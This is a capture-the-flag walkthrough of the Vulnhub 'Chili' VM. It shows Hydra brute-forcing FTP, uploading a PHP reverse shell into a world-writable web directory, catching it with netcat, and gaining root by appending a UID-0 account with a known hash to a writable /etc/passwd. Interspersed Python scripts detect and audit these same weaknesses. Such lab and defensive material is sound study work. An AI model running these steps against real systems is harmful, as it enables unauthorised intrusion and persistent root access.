Chili
Identifying the target host's IP address
This VM has a problem obtaining an IP address automatically from VirtualBox; I resolved it by following my other article on that issue.
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:49:52:e5 1 60 PCS Systemtechnik GmbH
192.168.56.179 08:00:27:77:88:2e 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.179.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.179 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-15 08:25 EST
Nmap scan report for bogon (192.168.56.179)
Host is up (0.000081s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Chili
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:77:88:2E (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.44 seconds
Get Access
Let's look at the FTP service first.
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ ftp 192.168.56.179
Connected to 192.168.56.179.
220 (vsFTPd 3.0.3)
Name (192.168.56.179:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp>
The target does not allow anonymous login, and this version of vsFTPd has no exploitable vulnerability.
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179
<html>
<body bgcolor="white">
<head>
<title>Chili</title>
<meta name="description" content="We Are Still Alive!">
<meta name="keywords" content="Chili">
<meta name="robots" content="index, follow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="language" content="English">
</head>
<link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
<style type="text/css">
@font-face {
font-family: 'Righteous', cursive;
font-family: 'Saira Stencil One', cursive;
}
</style>
<center><br><br>
<img src="Chile_WEB.jpg" width="400px" height="400px"><br>
</center></body></html>
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ wget http://192.168.56.179/Chile_WEB.jpg
--2022-11-15 08:44:58-- http://192.168.56.179/Chile_WEB.jpg
Connecting to 192.168.56.179:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 74290 (73K) [image/jpeg]
Saving to: ‘Chile_WEB.jpg’
Chile_WEB.jpg 100%[===============================================================================================================================>] 72.55K --.-KB/s in 0.001s
2022-11-15 08:44:58 (136 MB/s) - ‘Chile_WEB.jpg’ saved [74290/74290]
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ ls
Chile_WEB.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ steghide extract -sf Chile_WEB.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ stegseek Chile_WEB.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.19% (132.4 MB)
[!] error: Could not find a valid passphrase.
The image contains no usable information either.
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.179 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ gobuster dir -u http://192.168.56.179 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.179
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/15 08:46:20 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 218740 / 220561 (99.17%)
===============================================================
2022/11/15 08:46:42 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ nikto -h http://192.168.56.179
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.179
+ Target Hostname: 192.168.56.179
+ Target Port: 80
+ Start Time: 2022-11-15 08:46:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 291, size: 5aecf355f0724, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2022-11-15 08:47:40 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ dirb http://192.168.56.179
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 15 08:47:54 2022
URL_BASE: http://192.168.56.179/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.179/ ----
+ http://192.168.56.179/index.html (CODE:200|SIZE:657)
+ http://192.168.56.179/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Tue Nov 15 08:47:56 2022
DOWNLOADED: 4612 - FOUND: 2
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ gobuster dir -u http://192.168.56.179 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.179
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2022/11/15 08:48:56 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 657]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101162 / 1102805 (99.85%)
===============================================================
2022/11/15 08:50:56 Finished
===============================================================
Directory enumeration turned up nothing of value, so the only option is to go back to the FTP service.
The author's hint is that when progress stalls, think about the VM's name, which is chili.
So, using chili as the username, brute-force FTP with Hydra:
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ hydra -l chili -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.179
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-15 08:54:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.179:21/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 14344111 to do in 830:06h, 16 active
[STATUS] 296.00 tries/min, 888 tries in 00:03h, 14343511 to do in 807:38h, 16 active
[STATUS] 290.43 tries/min, 2033 tries in 00:07h, 14342366 to do in 823:04h, 16 active
[STATUS] 287.07 tries/min, 4306 tries in 00:15h, 14340093 to do in 832:34h, 16 active
[21][ftp] host: 192.168.56.179 login: chili password: a1b2c3d4
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-15 09:10:19
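From the defender's side, the Hydra run above is loud: vsftpd writes one FAIL LOGIN line per attempt to its log, and the eventual OK LOGIN from the same client is the tell that a password was guessed rather than typed. The following Python script is an added example, not part of the original writeup: it counts failed logins per (client, user) inside a sliding window, flags a burst, and flags any later success from a flagged client. The log lines are constructed to mimic vsftpd's log format; the one-minute window and threshold of five are assumptions to tune for a real site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample shaped like vsftpd's own log (/var/log/vsftpd.log):
#   <ctime> [pid N] [user] FAIL LOGIN: Client "ip"   or   OK LOGIN: Client "ip"
# 192.168.56.137 is the attacking Kali box from the session above; .50 is made up.
SAMPLE_LOG = """\
Tue Nov 15 08:54:41 2022 [pid 1401] [chili] FAIL LOGIN: Client "192.168.56.137"
Tue Nov 15 08:54:41 2022 [pid 1403] [chili] FAIL LOGIN: Client "192.168.56.137"
Tue Nov 15 08:54:42 2022 [pid 1405] [chili] FAIL LOGIN: Client "192.168.56.137"
Tue Nov 15 08:54:42 2022 [pid 1407] [chili] FAIL LOGIN: Client "192.168.56.137"
Tue Nov 15 08:54:43 2022 [pid 1409] [chili] FAIL LOGIN: Client "192.168.56.137"
Tue Nov 15 08:55:10 2022 [pid 1502] [chili] FAIL LOGIN: Client "192.168.56.50"
Tue Nov 15 09:10:19 2022 [pid 2981] [chili] OK LOGIN: Client "192.168.56.137"
Tue Nov 15 09:12:00 2022 [pid 3001] [chili] OK LOGIN: Client "192.168.56.50"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def parse(log_text):
    """Yield (timestamp, user, result, ip) for each login line; other lines are ignored."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
        yield ts, m.group("user"), m.group("result"), m.group("ip")


def detect(log_text, window=timedelta(minutes=1), threshold=5):
    """
    Return (bursts, compromises):
      bursts      - (ip, user, count, first_ts): `threshold` failures for one
                    (ip, user) pair within `window`
      compromises - (ip, user, ts): a successful login from a pair that had
                    already produced a burst, i.e. the password was likely guessed
    """
    recent = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    flagged = set()
    bursts, compromises = [], []
    for ts, user, result, ip in parse(log_text):
        key = (ip, user)
        if result == "FAIL":
            q = recent[key]
            q.append(ts)
            while q and ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                bursts.append((ip, user, len(q), q[0]))
        elif key in flagged:
            compromises.append((ip, user, ts))
    return bursts, compromises


if __name__ == "__main__":
    found_bursts, found_compromises = detect(SAMPLE_LOG)
    for ip, user, count, first in found_bursts:
        print(f"burst: {count} failures for {user!r} from {ip} starting {first}")
    for ip, user, ts in found_compromises:
        print(f"likely compromise: {user!r} logged in from {ip} at {ts}")
```

Run against a real `/var/log/vsftpd.log` this is the logic a fail2ban jail or SIEM rule encodes; the burst finding is the alert, and the compromise finding is the one that should page someone, because it means the lockout never happened.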
The FTP username and password were cracked successfully; now log in to FTP:
└─$ ftp 192.168.56.179
Connected to 192.168.56.179.
220 (vsFTPd 3.0.3)
Name (192.168.56.179:kali): chili
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||32717|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||58811|)
150 Here comes the directory listing.
drwxr-xr-x 3 1000 1000 4096 Sep 08 2020 .
drwxr-xr-x 3 0 0 4096 Sep 08 2020 ..
-rw-r--r-- 1 1000 1000 220 Sep 07 2020 .bash_logout
-rw-r--r-- 1 1000 1000 3526 Sep 07 2020 .bashrc
drwxr-xr-x 3 1000 1000 4096 Sep 08 2020 .local
-rw-r--r-- 1 1000 1000 807 Sep 07 2020 .profile
226 Directory send OK.
ftp> pwd
Remote directory: /home/chili
ftp> cd /var/www
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||18710|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Sep 08 2020 .
drwxr-xr-x 12 0 0 4096 Sep 08 2020 ..
drwxr-xr-x 4 0 0 4096 Sep 08 2020 html
226 Directory send OK.
ftp> cd html
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||37671|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 74290 Oct 22 2018 Chile_WEB.jpg
-rw-r--r-- 1 0 0 657 Sep 08 2020 index.html
226 Directory send OK.
ftp>
It turns out the directory can be changed freely: we can enter the web root, so a PHP script can be uploaded there.
150 Here comes the directory listing.
drwxr-xr-x 4 0 0 4096 Sep 08 2020 .
drwxr-xr-x 3 0 0 4096 Sep 08 2020 ..
drwxrwxrwx 2 0 0 4096 Sep 08 2020 .nano
drwxr-xr-x 2 0 0 4096 Sep 08 2020 .vim
-rw-r--r-- 1 0 0 74290 Oct 22 2018 Chile_WEB.jpg
-rw-r--r-- 1 0 0 657 Sep 08 2020 index.html
226 Directory send OK.
ftp>
The .nano directory is readable and writable by any user, so the script can be placed there.
ftp> cd .nano
250 Directory successfully changed.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||35742|)
150 Ok to send data.
100% |*************************************************************************************************************************************************************************************| 5496 95.29 MiB/s 00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (4.15 MiB/s)
ftp> ls -alh
229 Entering Extended Passive Mode (|||13137|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Nov 15 17:15 .
drwxr-xr-x 4 0 0 4096 Sep 08 2020 ..
-rw-r--r-- 1 1000 1000 0 Sep 08 2020 index.html
-rw------- 1 1000 1000 5496 Nov 15 17:15 shell.php
226 Directory send OK.
ftp> help
Commands may be abbreviated. Commands are:
! case dir fget idle mdelete modtime ntrans progress rcvbuf rmdir sndbuf type
$ cd disconnect form image mdir more open prompt recv rstatus status umask
account cdup edit ftp lcd mget mput page proxy reget runique struct unset
append chmod epsv gate less mkdir mreget passive put remopts send sunique usage
ascii close epsv4 get lpage mls msend pdir pwd rename sendport system user
bell cr epsv6 glob lpwd mlsd newer pls quit reset set tenex verbose
binary debug exit hash ls mlst nlist pmlsd quote restart site throttle xferbuf
bye delete features help macdef mode nmap preserve rate rhelp size trace ?
ftp> chmod 777 shell.php
200 SITE CHMOD command ok.
ftp> ls -alh
229 Entering Extended Passive Mode (|||30184|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Nov 15 17:15 .
drwxr-xr-x 4 0 0 4096 Sep 08 2020 ..
-rw-r--r-- 1 1000 1000 0 Sep 08 2020 index.html
-rwxrwxrwx 1 1000 1000 5496 Nov 15 17:15 shell.php
226 Directory send OK.
ftp>
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ curl http://192.168.56.179/.nano/shell.php
The reverse shell is received successfully on Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.179] 35822
Linux chili 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
17:17:26 up 54 min, 0 users, load average: 0.00, 0.02, 0.21
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@chili:/$
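Two misconfigurations combined to turn a guessed FTP password into code execution: the local user was not confined to its home directory (the `cd /var/www` above succeeded), and a directory under the web root was world-writable, so a `.php` file dropped there was served and executed by Apache. The following Python script is an added example, not the project's own code: it audits a vsftpd.conf fragment for the relevant settings and walks a web root for world-writable directories and script files. The two configuration fragments are constructed (the weak one reflects what the session above implies, not a copy of the VM's real file), and the directory tree in `demo()` is built in a temporary directory to mirror `/var/www/html` above.

```python
import os
import stat
import tempfile

# Constructed vsftpd.conf fragments: weak (what the session above implies) and hardened.
WEAK_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
# chroot_local_user left at its default (NO)
"""

HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
chroot_local_user=YES
allow_writeable_chroot=NO
"""

# Extensions Apache is commonly configured to execute (assumption; adjust to the site).
SCRIPT_EXT = {".php", ".phtml", ".phar", ".cgi", ".pl", ".py", ".sh"}


def parse_vsftpd_conf(text):
    """Return {key: VALUE} from key=value lines, skipping blanks and # comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip().upper()
    return conf


def audit_vsftpd_conf(text):
    """List settings that let an authenticated FTP user roam and write outside $HOME.
    Defaults used below are vsftpd's compiled-in defaults."""
    conf = parse_vsftpd_conf(text)
    findings = []
    if conf.get("anonymous_enable", "YES") == "YES":
        findings.append("anonymous_enable=YES: anonymous logins allowed")
    if conf.get("local_enable", "NO") == "YES" and conf.get("chroot_local_user", "NO") != "YES":
        findings.append("chroot_local_user!=YES: local users can browse the whole filesystem")
    if conf.get("write_enable", "NO") == "YES":
        findings.append("write_enable=YES: authenticated users may upload/modify files")
    if conf.get("allow_writeable_chroot", "NO") == "YES":
        findings.append("allow_writeable_chroot=YES: chroot root is writable")
    return findings


def find_writable_script_dirs(webroot):
    """Return sorted paths (relative to webroot) of world-writable directories
    and world-writable script files: either lets uploaded code be executed."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(webroot):
        for name in dirnames:
            p = os.path.join(dirpath, name)
            if os.stat(p).st_mode & stat.S_IWOTH:
                hits.append(os.path.relpath(p, webroot) + "/")
        for name in filenames:
            p = os.path.join(dirpath, name)
            if os.path.splitext(name)[1] in SCRIPT_EXT and os.stat(p).st_mode & stat.S_IWOTH:
                hits.append(os.path.relpath(p, webroot))
    return sorted(hits)


def demo():
    """Build a constructed tree mirroring /var/www/html above and scan it."""
    with tempfile.TemporaryDirectory() as base:
        nano = os.path.join(base, ".nano")
        os.makedirs(nano)
        for rel in ("index.html", ".nano/index.html", ".nano/shell.php"):
            open(os.path.join(base, rel), "w").close()
        os.chmod(nano, 0o777)                              # drwxrwxrwx .nano
        os.chmod(os.path.join(nano, "shell.php"), 0o777)   # -rwxrwxrwx shell.php
        return find_writable_script_dirs(base)


if __name__ == "__main__":
    print("weak conf:", audit_vsftpd_conf(WEAK_CONF))
    print("hardened conf:", audit_vsftpd_conf(HARDENED_CONF))
    print("writable under webroot:", demo())
```

On a live host, call `find_writable_script_dirs("/var/www")` as root; a non-empty result is a finding regardless of whether FTP is involved, since any web-application file-write bug lands in the same place.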
Privilege escalation
Upload the linpeas.sh script to the target's /tmp directory, change its permissions, and run it.
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/passwd
/run/lock
/run/lock/apache2
/tmp
/tmp/linpeas.sh
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
/var/tmp
/var/www/html/.nano
/var/www/html/.nano/shell.php
The linpeas.sh script reports a suspicious file: /etc/passwd is writable.
www-data@chili:/tmp$ ls -alh /etc/passwd
ls -alh /etc/passwd
-rw-r--rw- 1 root root 1.5K Sep 8 2020 /etc/passwd
Generate a password hash with the openssl tool on Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/Chili]
└─$ openssl passwd -1 -salt jason 123456
$1$jason$kqq2SnNAGHtj7Joa0Zlp61
www-data@chili:/tmp$ echo 'jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash' >>/etc/passwd
www-data@chili:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
chili:x:1000:1000:chili,,,:/home/chili:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash
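The root cause here is the mode `-rw-r--rw-` on /etc/passwd; once it is world-writable, the second field is honoured by `su` and PAM, so an embedded hash bypasses /etc/shadow entirely. The following Python script is an added example, not from the original writeup: it audits passwd entries for a hash in the password field, extra UID 0 accounts, duplicate names and malformed lines, and checks both a live file's mode and an `ls -l` mode string. The sample entries are a subset of the listing printed above, including the appended line.

```python
import os
import stat

# Subset of the /etc/passwd listing above, as printed after the extra line was appended.
PASSWD_AFTER = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chili:x:1000:1000:chili,,,:/home/chili:/bin/bash
jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash
"""

# Values legitimately found in the password field when shadow passwords are in use.
SHADOWED = ("x", "*", "!", "!!")


def audit_passwd_entries(text):
    """Return a list of findings for the given /etc/passwd content."""
    findings = []
    seen = set()
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {n}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if name in seen:
            findings.append(f"line {n}: duplicate user name {name!r}")
        seen.add(name)
        if pw == "":
            findings.append(f"line {n}: empty password for {name!r}")
        elif pw not in SHADOWED:
            findings.append(f"line {n}: password hash stored in /etc/passwd for {name!r}")
        if uid == "0" and name != "root":
            findings.append(f"line {n}: extra UID 0 account {name!r}")
    return findings


def mode_string_findings(mode_str, path="/etc/passwd"):
    """Check an `ls -l` mode string such as '-rw-r--rw-' (positions 5 and 8 are
    the group and other write bits); expected for /etc/passwd is '-rw-r--r--'."""
    findings = []
    if len(mode_str) < 10:
        return [f"{path}: unrecognised mode string {mode_str!r}"]
    if mode_str[5] == "w":
        findings.append(f"{path}: group-writable ({mode_str})")
    if mode_str[8] == "w":
        findings.append(f"{path}: world-writable ({mode_str})")
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Live check: mode bits from stat plus the entry audit on the file content."""
    st = os.stat(path)
    findings = []
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: mode {stat.S_IMODE(st.st_mode):04o} is group/world writable")
    if st.st_uid != 0:
        findings.append(f"{path}: not owned by root (uid {st.st_uid})")
    with open(path) as fh:
        findings.extend(audit_passwd_entries(fh.read()))
    return findings


if __name__ == "__main__":
    for f in mode_string_findings("-rw-r--rw-") + audit_passwd_entries(PASSWD_AFTER):
        print(f)
```

`pwck -r` performs the structural part of this check on a real system, and a file-integrity monitor (AIDE, or auditd watching /etc/passwd for writes) catches the append itself; the mode check is the one that would have prevented it.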
Switch directly to the jason user (which has superuser privileges):
www-data@chili:/tmp$ su - jason
su - jason
Password: 123456
root@chili:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@chili:~# ls -alh
ls -alh
total 32K
drwx------ 3 root root 4.0K Sep 8 2020 .
drwxr-xr-x 18 root root 4.0K Sep 7 2020 ..
-rw------- 1 root root 126 Sep 8 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Sep 8 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 47 Sep 8 2020 proof.txt
-rw-r--r-- 1 root root 176 Sep 8 2020 .wget-hsts
root@chili:~# cat proof.txt
cat proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b
root@chili:~#
Privilege escalation successful!!!
From: https://www.cnblogs.com/jason-huawen/p/16894316.html